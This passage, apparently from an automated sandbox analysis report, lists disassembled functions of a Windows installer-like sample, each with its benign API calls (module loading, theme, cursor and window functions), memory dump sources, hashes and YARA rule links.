                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • GetModuleHandleA.KERNEL32(user32.dll,ShutdownBlockReasonDestroy,?,00000000,0042EAD0), ref: 0042EB62
                                                                                                                            • GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0042EB68
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: AddressHandleModuleProc
                                                                                                                            • String ID: ShutdownBlockReasonDestroy$user32.dll
                                                                                                                            • API String ID: 1646373207-260599015
                                                                                                                            • Opcode ID: 88ce12e330a2fc51ece58c284b54de3a76b504cb94a4c995bd1a3fb2c6ea0693
                                                                                                                            • Instruction ID: e1ec077e445c8734ae54db5ffdd633522f5c412f0b7fee52e54de0d29bb4c321
                                                                                                                            • Opcode Fuzzy Hash: 88ce12e330a2fc51ece58c284b54de3a76b504cb94a4c995bd1a3fb2c6ea0693
                                                                                                                            • Instruction Fuzzy Hash: A2D0C793311732665D10B1F73CD1EAB058C891527935404B7F515E5641D55DEC1115AD
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0044F744 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 16libraryloaderCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • GetModuleHandleA.KERNEL32(user32.dll,NotifyWinEvent,00498BF2), ref: 0044F77F
                                                                                                                            • GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0044F785
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: AddressHandleModuleProc
                                                                                                                            • String ID: NotifyWinEvent$user32.dll
                                                                                                                            • API String ID: 1646373207-597752486
                                                                                                                            • Opcode ID: f97c3de5cacafbf63d36e16939e29d51eb7e912e87a0fb2b79f6fc39cd446e20
                                                                                                                            • Instruction ID: 5e946f17392c81a4f172a46fe169fb9a1f72c9003761a5edf28bd31acc2f1150
                                                                                                                            • Opcode Fuzzy Hash: f97c3de5cacafbf63d36e16939e29d51eb7e912e87a0fb2b79f6fc39cd446e20
                                                                                                                            • Instruction Fuzzy Hash: 59E012F0E417049AFF00BBB57B86B1A3A90E764719B00057FF414A6292DB7C481C4F9D
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00498968 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 9libraryloaderCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • GetModuleHandleA.KERNEL32(user32.dll,DisableProcessWindowsGhosting,00498C48,00000001,00000000,00498C6C), ref: 00498972
                                                                                                                            • GetProcAddress.KERNEL32(00000000,user32.dll), ref: 00498978
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: AddressHandleModuleProc
                                                                                                                            • String ID: DisableProcessWindowsGhosting$user32.dll
                                                                                                                            • API String ID: 1646373207-834958232
                                                                                                                            • Opcode ID: 71af8591fbce5d4533a7188bae6238bebf63b2f5996384562a89c67780edd1c3
                                                                                                                            • Instruction ID: 34f838485a85c0df890c3e192e44216071158a5cea444d63bbc0a0b2480586ef
                                                                                                                            • Opcode Fuzzy Hash: 71af8591fbce5d4533a7188bae6238bebf63b2f5996384562a89c67780edd1c3
                                                                                                                            • Instruction Fuzzy Hash: 22B002C0651707589D5032FA0D06B3F48484C5276D728057F3414A51C6DD6C89115D3F
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 004645F4 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 8libraryloaderCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 0044B658: LoadLibraryA.KERNEL32(uxtheme.dll,?,0044F775,00498BF2), ref: 0044B67F
                                                                                                                              • Part of subcall function 0044B658: GetProcAddress.KERNEL32(00000000,OpenThemeData), ref: 0044B697
                                                                                                                              • Part of subcall function 0044B658: GetProcAddress.KERNEL32(00000000,CloseThemeData), ref: 0044B6A9
                                                                                                                              • Part of subcall function 0044B658: GetProcAddress.KERNEL32(00000000,DrawThemeBackground), ref: 0044B6BB
                                                                                                                              • Part of subcall function 0044B658: GetProcAddress.KERNEL32(00000000,DrawThemeText), ref: 0044B6CD
                                                                                                                              • Part of subcall function 0044B658: GetProcAddress.KERNEL32(00000000,GetThemeBackgroundContentRect), ref: 0044B6DF
                                                                                                                              • Part of subcall function 0044B658: GetProcAddress.KERNEL32(00000000,GetThemeBackgroundContentRect), ref: 0044B6F1
                                                                                                                              • Part of subcall function 0044B658: GetProcAddress.KERNEL32(00000000,GetThemePartSize), ref: 0044B703
                                                                                                                              • Part of subcall function 0044B658: GetProcAddress.KERNEL32(00000000,GetThemeTextExtent), ref: 0044B715
                                                                                                                              • Part of subcall function 0044B658: GetProcAddress.KERNEL32(00000000,GetThemeTextMetrics), ref: 0044B727
                                                                                                                              • Part of subcall function 0044B658: GetProcAddress.KERNEL32(00000000,GetThemeBackgroundRegion), ref: 0044B739
                                                                                                                              • Part of subcall function 0044B658: GetProcAddress.KERNEL32(00000000,HitTestThemeBackground), ref: 0044B74B
                                                                                                                              • Part of subcall function 0044B658: GetProcAddress.KERNEL32(00000000,DrawThemeEdge), ref: 0044B75D
                                                                                                                              • Part of subcall function 0044B658: GetProcAddress.KERNEL32(00000000,DrawThemeIcon), ref: 0044B76F
                                                                                                                              • Part of subcall function 0044B658: GetProcAddress.KERNEL32(00000000,IsThemePartDefined), ref: 0044B781
                                                                                                                              • Part of subcall function 0044B658: GetProcAddress.KERNEL32(00000000,IsThemeBackgroundPartiallyTransparent), ref: 0044B793
                                                                                                                              • Part of subcall function 0044B658: GetProcAddress.KERNEL32(00000000,GetThemeColor), ref: 0044B7A5
                                                                                                                              • Part of subcall function 0044B658: GetProcAddress.KERNEL32(00000000,GetThemeMetric), ref: 0044B7B7
                                                                                                                            • LoadLibraryA.KERNEL32(shell32.dll,SHPathPrepareForWriteA,00498C1A), ref: 00464603
                                                                                                                            • GetProcAddress.KERNEL32(00000000,shell32.dll), ref: 00464609
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: AddressProc$LibraryLoad
                                                                                                                            • String ID: SHPathPrepareForWriteA$shell32.dll
                                                                                                                            • API String ID: 2238633743-2683653824
                                                                                                                            • Opcode ID: edc6f8ec64a36a5908760ff58e990ea99ea877eb638915fc896b3384d426fa6b
                                                                                                                            • Instruction ID: ed4894befccbfeda2ad80f7d1b9e1cb4df1a551eae9986247d0c145e26b1cd95
                                                                                                                            • Opcode Fuzzy Hash: edc6f8ec64a36a5908760ff58e990ea99ea877eb638915fc896b3384d426fa6b
                                                                                                                            • Instruction Fuzzy Hash: DDB092D0A82740A4C90077F2985B90F2A4488A271EB10153B710476483EABC84100EAE
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0047D67C Relevance: 6.2, APIs: 4, Instructions: 195fileCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • FindNextFileA.KERNEL32(000000FF,?,00000000,0047D7F0,?,?,?,?,00000000,0047D945,?,?,?,00000000,?,0047DA54), ref: 0047D7CC
                                                                                                                            • FindClose.KERNEL32(000000FF,0047D7F7,0047D7F0,?,?,?,?,00000000,0047D945,?,?,?,00000000,?,0047DA54,00000000), ref: 0047D7EA
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Find$CloseFileNext
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2066263336-0
                                                                                                                            • Opcode ID: df8c12b404288ac1cc0f16a4307cfa19f630790b74cd409a531bdd723e619500
                                                                                                                            • Instruction ID: 2ce97de6e4eb512f8d4c2eb376340b964b0e691095a652a34be041e4083b4e02
                                                                                                                            • Opcode Fuzzy Hash: df8c12b404288ac1cc0f16a4307cfa19f630790b74cd409a531bdd723e619500
                                                                                                                            • Instruction Fuzzy Hash: 07813A74D0024D9FCF11EFA5CC91ADFBBB8EF49304F5080AAE908A7291D6399A46CF54
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 004755AC Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 114COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 0042EE30: GetTickCount.KERNEL32 ref: 0042EE36
                                                                                                                              • Part of subcall function 0042EC88: MoveFileExA.KERNEL32(00000000,00000000,00000001(MOVEFILE_REPLACE_EXISTING)), ref: 0042ECBD
                                                                                                                            • GetLastError.KERNEL32(00000000,00475721,?,?,0049C1E0,00000000), ref: 0047560A
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CountErrorFileLastMoveTick
                                                                                                                            • String ID: $LoggedMsgBox returned an unexpected value. Assuming Cancel.$MoveFileEx
                                                                                                                            • API String ID: 2406187244-2685451598
                                                                                                                            • Opcode ID: b4e541c37b522712e9a51433fba2d6f7c47cca6c6c5b44fd3a0118cd85a505a9
                                                                                                                            • Instruction ID: cfe7f312216358cbd0971b398f0cafde252de4893b1317a5ce8d70824cf78b76
                                                                                                                            • Opcode Fuzzy Hash: b4e541c37b522712e9a51433fba2d6f7c47cca6c6c5b44fd3a0118cd85a505a9
                                                                                                                            • Instruction Fuzzy Hash: 4D418570A006099BDB10EFA5D882AEF77B5FF48314F508537E408BB395D7789A058BA9
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00413CF8 Relevance: 6.1, APIs: 4, Instructions: 107COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • GetDesktopWindow.USER32 ref: 00413D46
                                                                                                                            • GetDesktopWindow.USER32 ref: 00413DFE
                                                                                                                              • Part of subcall function 00418EC0: 6F5AC6F0.COMCTL32(?,00000000,00413FC3,00000000,004140D3,?,?,0049B628), ref: 00418EDC
                                                                                                                              • Part of subcall function 00418EC0: ShowCursor.USER32(00000001,?,00000000,00413FC3,00000000,004140D3,?,?,0049B628), ref: 00418EF9
                                                                                                                            • SetCursor.USER32(00000000,?,?,?,?,00413AF3,00000000,00413B06), ref: 00413E3C
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CursorDesktopWindow$Show
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2074268717-0
                                                                                                                            • Opcode ID: 48e3412c1a46991eea637d4b1b247886da5b7466a2ee9d80c19fa9edf3c8b710
                                                                                                                            • Instruction ID: d0219f8535474b9b7e790bb207accfb6dce16a9ac66decbe361331da1304c66b
                                                                                                                            • Opcode Fuzzy Hash: 48e3412c1a46991eea637d4b1b247886da5b7466a2ee9d80c19fa9edf3c8b710
                                                                                                                            • Instruction Fuzzy Hash: 91412C75600210AFC710DF2AFA84B56B7E1EB65329B16817BE405CB365DB38DD81CF98
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00408A54 Relevance: 6.1, APIs: 4, Instructions: 95windowCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • GetModuleFileNameA.KERNEL32(00400000,?,00000100), ref: 00408A75
                                                                                                                            • LoadStringA.USER32(00400000,0000FF9E,?,00000040), ref: 00408AE4
                                                                                                                            • LoadStringA.USER32(00400000,0000FF9F,?,00000040), ref: 00408B7F
                                                                                                                            • MessageBoxA.USER32(00000000,?,?,00002010), ref: 00408BBE
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: LoadString$FileMessageModuleName
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 704749118-0
                                                                                                                            • Opcode ID: ede814ba8b2c905ab74f80468cae56b5ab65d73ed59c96bbcc76a4520df8398d
                                                                                                                            • Instruction ID: 7d65b0a5aa49ad722f3f3263bbe29e3330acee4661d9e2153cfe083702b22da2
                                                                                                                            • Opcode Fuzzy Hash: ede814ba8b2c905ab74f80468cae56b5ab65d73ed59c96bbcc76a4520df8398d
                                                                                                                            • Instruction Fuzzy Hash: 1F3123716083849AD370EB65C945BDF77D89B85704F40483FB6C8E72D1EB7859048B6B
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0044E8C4 Relevance: 6.1, APIs: 4, Instructions: 83windowCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • SendMessageA.USER32(00000000,000001A1,?,00000000), ref: 0044E90D
                                                                                                                              • Part of subcall function 0044CF50: SendMessageA.USER32(00000000,000001A0,?,00000000), ref: 0044CF82
                                                                                                                            • InvalidateRect.USER32(00000000,00000000,00000001,00000000,000001A1,?,00000000), ref: 0044E991
                                                                                                                              • Part of subcall function 0042BBB4: SendMessageA.USER32(00000000,0000018E,00000000,00000000), ref: 0042BBC8
                                                                                                                            • IsRectEmpty.USER32(?), ref: 0044E953
                                                                                                                            • ScrollWindowEx.USER32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000006), ref: 0044E976
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: MessageSend$Rect$EmptyInvalidateScrollWindow
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 855768636-0
                                                                                                                            • Opcode ID: a4575d285c62c1c56b7686ad69dfdc5ef60a631fed5d3d1fc0705a1474777ead
                                                                                                                            • Instruction ID: f7bad605b8f68185b4e834990bb8ca2287257270a928060092b59a923d315d7c
                                                                                                                            • Opcode Fuzzy Hash: a4575d285c62c1c56b7686ad69dfdc5ef60a631fed5d3d1fc0705a1474777ead
                                                                                                                            • Instruction Fuzzy Hash: E5114A71B0030067E650BA7B8C86B5B76C9AB88748F15083FB545EB387DE7DDD094299
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00495924 Relevance: 6.1, APIs: 4, Instructions: 81COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • OffsetRect.USER32(?,?,00000000), ref: 00495988
                                                                                                                            • OffsetRect.USER32(?,00000000,?), ref: 004959A3
                                                                                                                            • OffsetRect.USER32(?,?,00000000), ref: 004959BD
                                                                                                                            • OffsetRect.USER32(?,00000000,?), ref: 004959D8
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: OffsetRect
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 177026234-0
                                                                                                                            • Opcode ID: e6cd63ab1267e2bef36e0ea42f4f89ffcc49fa5b03609306a0fb63f812f5ac90
                                                                                                                            • Instruction ID: 9409249b62c1188f54b5b62e2685c04785358b71117f53a2337039625fc08c68
                                                                                                                            • Opcode Fuzzy Hash: e6cd63ab1267e2bef36e0ea42f4f89ffcc49fa5b03609306a0fb63f812f5ac90
                                                                                                                            • Instruction Fuzzy Hash: 1121AEB6700701AFDB00DE69CD81E5BB7DAEFC4350F248A2AF944C3249D638ED048761
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00417218 Relevance: 6.1, APIs: 4, Instructions: 72COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • GetCursorPos.USER32 ref: 00417260
                                                                                                                            • SetCursor.USER32(00000000), ref: 004172A3
                                                                                                                            • GetLastActivePopup.USER32(?), ref: 004172CD
                                                                                                                            • GetForegroundWindow.USER32(?), ref: 004172D4
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Cursor$ActiveForegroundLastPopupWindow
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1959210111-0
                                                                                                                            • Opcode ID: 0325eb73ca892009698aa7541b5e3073a06fcfb7bd7d3fb361e05756697ccdec
                                                                                                                            • Instruction ID: de3f0dc6b436800086b9427ec8ddd2ec86eeedce3a35093462374e80c8eda50e
                                                                                                                            • Opcode Fuzzy Hash: 0325eb73ca892009698aa7541b5e3073a06fcfb7bd7d3fb361e05756697ccdec
                                                                                                                            • Instruction Fuzzy Hash: C52183313086118AD720AFA9E945AE733F1EF44754B0544ABF8558B352DB3DDC82CB9E
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 004955DC Relevance: 6.1, APIs: 4, Instructions: 59COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • MulDiv.KERNEL32(?,00000008,?), ref: 004955F1
                                                                                                                            • MulDiv.KERNEL32(?,00000008,?), ref: 00495605
                                                                                                                            • MulDiv.KERNEL32(?,00000008,?), ref: 00495619
                                                                                                                            • MulDiv.KERNEL32(?,00000008,?), ref: 00495637
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: b0bc83cb44cddb6cfb83e9cff79c84a8c4632dee95d4fc6912c32f85648e17c5
                                                                                                                            • Instruction ID: b77f8f3c6746ea581d036ce488ab013aedd37a602364075716cddbfd1b85439e
                                                                                                                            • Opcode Fuzzy Hash: b0bc83cb44cddb6cfb83e9cff79c84a8c4632dee95d4fc6912c32f85648e17c5
                                                                                                                            • Instruction Fuzzy Hash: A5112E72604504ABCB40DEA9D8C4D9B7BECEF8D324B6441AAF908DB242D674ED408B68
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0041F480 Relevance: 6.1, APIs: 4, Instructions: 56registryCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • GetClassInfoA.USER32(00400000,0041F470,?), ref: 0041F4A1
                                                                                                                            • UnregisterClassA.USER32(0041F470,00400000), ref: 0041F4CA
                                                                                                                            • RegisterClassA.USER32(00499598), ref: 0041F4D4
                                                                                                                            • SetWindowLongA.USER32(00000000,000000FC,00000000), ref: 0041F50F
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmpDownload File
